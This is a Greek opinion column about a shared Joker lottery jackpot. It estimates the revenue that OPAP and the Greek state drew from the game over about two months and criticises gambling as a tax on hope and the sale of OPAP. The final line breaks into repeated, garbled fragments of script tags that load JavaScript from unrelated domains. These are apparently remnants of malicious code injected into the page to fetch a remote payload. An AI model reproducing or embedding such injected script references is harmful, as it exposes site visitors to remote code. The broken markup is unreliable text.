Φόρος ονείρων & εμπόριο ελπίδας

3E67C04D2471F681FE37373E8CF4D345

Το όνειρο ζωής δύο συμπατριωτών μας προχθές έγινε πραγματικότητα. Για τους δύο υπερτυχερούς του τζόκερ μιλάω που μοιράστηκαν τα 18 εκατομμύρια του τζακ – ποτ. Σε καλή μεριά και είναι ευχής έργον αν οι άνθρωποι είναι του μόχθου και έτσι κατάφεραν να λύσουν το οικονομικό τους πρόβλημα μια για πάντα, τόσο γι’ αυτούς όσο και για τα δισέγγονά τους ακόμη.

Γράφει ο Γιάννης Δραπανιώτης

Από τις 14 Σεπτεμβρίου, τελευταία φορά πριν την προχθεσινή που αναδείχθηκαν νικητές στην πρώτη κατηγορία του τζόκερ, πολλοί Έλληνες κυνήγησαν το όνειρο τους. Εξ’ άλλου ίσως μέσα σ’ αυτό το γενικό κλίμα παρακμής και φτώχειας είναι η μοναδική ελπίδα να βγουν απ’ τη μιζέρια και τη στέρηση. Γι’ αυτό δεν είναι και τυχαίο το γεγονός, ότι όπου υπάρχει φτώχεια ανθεί ο τζόγος και κάθε είδους τυχερό παίγνιο, μέσα από το οποίο χιλιάδες κυνηγούν το όνειρο μιας καλύτερης ζωή, κάποιες φορές ελάχιστοι το καταφέρνουν, πάντα μα πάντα όμως κάποιοι …άλλοι κερδίζουν πακτωλούς εκατομμυρίων χωρίς να περιμένουν τις κληρώσεις ή τα αποτελέσματα των αγώνων.

Τελικά ποιοι είναι οι μεγάλοι νικητές τις φρενίτιδας του Τζόκερ των τελευταίων ημερών; Είναι ένας από την Πέλλα και ένας από την Κορινθία; ή ο ΟΠΑΠ και το Ελληνικό δημόσιο; Αν δούμε τα πράγματα λίγο με απόλυτους αριθμούς θα μας λυθεί η απορία.

Λοιπόν εν τάχει: Από τις 14 Σεπτεμβρίου ως την Πέμπτη 6 Νοεμβρίου παίχτηκαν μόνο στο Τζόκερ, σύμφωνα με όσα διαβάζουμε σε δημοσιεύματα 92,5 εκ ευρώ. Από αυτά διανεμήθηκαν συνολικά περίπου 40 εκατομμύρια σε νικητές όλο αυτό το διάστημα, δηλαδή μένουν στον ΟΠΑΠ 52,5 εκ. Ο φόρος από τα έσοδα του Τζόκερ, που πάει στο δημόσιο (περίπου 30%) είναι 15 εκ. Περίπου άλλα 10 εκ. Ευρώ μοιράζονται στα πρακτορεία, ως προμήθεια, άρα 27 εκ μένουν στον ΟΠΑΠ, ο οποίος θα φορολογηθεί και γι’ αυτά (φόρος καθαρών κερδών νομικών προσώπων) και ο φόρος που θα πληρώσει είναι 5 εκ. Άρα λοιπόν από ένα τυχερό του παιχνίδι και για διάστημα λιγότερο του των δύο μηνών η ΟΠΑΠ Α.Ε. εισέπραξε 20-22 εκ. Ευρώ. Προσοχή από ένα παιχνίδι μόνο!

Το δημόσιο τώρα είπαμε εισπράττει 15 εκ. Φόρο εσόδων από τυχερά παιχνίδια, 5 εκ. Ευρώ φόρο καθαρών κερδών νομικών προσώπων, περίπου 10 εκ. Ευρώ φόρος κερδών (από τους νικητές δηλαδή) και αν υπολογίσουμε χοντρικά και το φόρο εισοδήματος των πρακτόρων περίπου 2,5 εκ. Ευρώ τότε στον κρατικό κορβανά μπαίνουν 32-33 εκ ευρώ περίπου. Προσοχή και εδώ από ένα μόνο παιχνίδι και για διάστημα λιγότερο από δύο μήνες!.

Α και μιας και μιλάμε για φορολόγηση, σίγουρα τα κέρδη του κάποιος θα καταθέσει σε μια τράπεζα, άρα το δημόσιο θα εισπράξει και από εκεί το φόρο που αναλογεί στους τόκους καταθέσεων.

Η απορία λύθηκε. Μεγάλοι νικητές είναι το Ελληνικό Δημόσιο και η ΟΠΑΠ Α.Ε. Το εμπόριο ελπίδας και ονείρων τελικά είναι η πιο κερδοφόρα μπίζνα και ο ποιό προσοδοφόρος έμμεσος φόρος για το κράτος, που όλοι πληρώνουμε και μάλιστα με ευχαρίστηση γιατί …όσο ζούμε ελπίζουμε !!! Εξ’ άλλου στην Ελλάδα του μνημονίου, το Τζόκερ και το κάθε είδος τυχερού παιχνιδιού είναι η μόνη ελπίδα ενός αποχαυνωμένου λαού, που δεν σηκώνεται από τον καναπέ για να διεκδικήσει πραγματικά τη ζωή και τα όνειρα που του στέρησαν.

Ας αφήσουμε όμως λίγο τη φιλοσοφία και ας βάλουμε και δύο πρακτικά ερωτήματα.

Αν το κράτος από ένα μόνο παιχνίδι, μέσα σε δύο μήνες εισέπραξε αυτό το ποσό (32 εκ. Ευρώ) φανταζόμαστε τι εισπράττει από όλα τα παιχνίδια του ΟΠΑΠ για ένα ολόκληρο χρόνο. Ερώτημα. Πού πάνε αυτά τα λεφτά;

Αν ο ΟΠΑΠ μέσα σε δύο μήνες  μόνο από Τζόκερ έβαλε καθαρά στα ταμεία του 20 εκ. Ευρώ φανταζόμαστε ποιά θα είναι τα κέρδη του ολόκληρο το χρόνο και απ’ όλα τα παιχνίδια του. Ερώτημα. Μια τόσο κερδοφόρα εταιρεία και μάλιστα σύμφωνα με μελέτες στις πρώτες πανευρωπαϊκά, γιατί το δημόσιο την πούλησε σε ξένα ιδιωτικά συμφέροντα (Τσέχικα) και σε συμφέροντα Ελλήνων ολιγαρχιών (Μελισανίδης);

Θα μου πείτε και με το δίκιο σας «ψιλά γράμματα φίλε αυτά σε μια χώρα που ξεπουλάει ακόμη και τα τελευταία ίχνη αξιοπρέπειάς της»!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >